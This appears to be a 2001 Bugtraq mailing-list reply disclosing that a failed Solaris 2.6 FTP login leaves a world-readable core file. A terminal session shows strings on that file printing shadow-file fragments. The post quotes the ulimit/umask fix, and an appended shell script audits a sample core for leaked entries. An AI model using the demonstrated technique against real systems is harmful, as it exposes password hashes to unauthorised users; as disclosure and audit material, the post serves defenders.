[20258] in bugtraq
Re: SUN SOLARIS 5.6/5.7 FTP Globbing Exploit !
daemon@ATHENA.MIT.EDU (Warning3)
Tue Apr 17 12:28:43 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="GB2312"
Content-Transfer-Encoding: 7bit
Message-ID: <200104170654.OAA32455@intra.nsfocus.com>
Date: Tue, 17 Apr 2001 14:44:49 +0800
Reply-To: warning3@mail.com
From: Warning3 <warning3@mail.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Yes. It is possible that a local user can get part of the shadow file in
Solaris 2.6, since the core file is world readable.
[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3. <-- a valid username
pass blahblah <-- a wrong password
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
[...snip...]
---Original Message---
[...snip...]
>
>However, this can present other problems, so you should ensure that core
>dumps are disabled for inetd (add "ulimit -c 0" before starting inetd in
>/etc/init.d/inetsvc) or at least that they are not world readable (add a
>umask line); they are world readable by default under 2.6.
>
>--
> ghandi / ghandi@mindless.com / www.dopesquad.net
> "Bein' Crazy is the least of my worries." - Jack Kerouac
> C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F
Regards,
Warning3 <warning3@mail.com>
http://www.nsfocus.com
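The check the post performs by hand (is the core world readable, and did shadow entries land in it), as an added example that is not part of the original post or of Solaris: a POSIX sh audit that reports which usernames' records leaked without copying the hashes themselves. The sample core, its path and the strings(1) stand-in are constructed here.

```shell
#!/bin/sh
# Added example, not part of the original post: audit a core file the way the
# post's session does by hand: is it world readable, and did shadow(4)-style
# records (name:passwd:lastchg:min:max:...) end up inside it? Only usernames
# are reported, so the audit output does not itself copy password hashes.
# The sample core is constructed below; its path is an assumption.

SAMPLE_CORE="${TMPDIR:-/tmp}/sample_core.$$"

# Stand-in for /core: non-printable bytes around the kinds of fragments the
# post shows (whole and truncated shadow lines) plus a passwd(4) line.
make_sample_core() {
    printf 'ELF\001\002\000lp:NP:6445::::::\000root:x:0:0:Super-User:/:/sbin/sh\000uucp:NP:6445:::\000\001P:64\000' > "$SAMPLE_CORE"
    chmod 644 "$SAMPLE_CORE"   # world readable, the 2.6 default the post reports
}

# check_core_perms FILE: "world-readable" if others may read it, else "ok".
# Reads the other-read bit (char 8) from ls -ld, which looks the same on SunOS
# and GNU userlands, unlike stat(1).
check_core_perms() {
    case "$(ls -ld "$1" | cut -c8)" in
        r) echo world-readable ;;
        *) echo ok ;;
    esac
}

# printable_runs FILE: strings(1) replacement (binutils may be absent); every
# non-printable byte becomes a newline, so each text fragment is one line.
printable_runs() {
    tr -c '[:print:]' '\n' < "$1"
}

# leaked_shadow_users FILE: names from fragments shaped like shadow entries:
# a user name, a non-empty password field, then only numeric-or-empty fields.
# passwd(4) lines fail because their gecos and shell fields are not numeric.
leaked_shadow_users() {
    printable_runs "$1" \
        | grep -E '^[A-Za-z_][A-Za-z0-9_-]*:[^:]+(:[0-9]*)+$' \
        | cut -d: -f1
}

# count_leaked_shadow_users FILE: number of such records ("0" when none).
count_leaked_shadow_users() {
    leaked_shadow_users "$1" | grep -c . || true
}

make_sample_core
echo "perms: $(check_core_perms "$SAMPLE_CORE")"
echo "leaked shadow records: $(count_leaked_shadow_users "$SAMPLE_CORE")"
leaked_shadow_users "$SAMPLE_CORE"
```

Run it against a real core with the path substituted; a non-zero count on a world-readable file is the condition the post demonstrates, and the fix is the ulimit/umask change the quoted message gives.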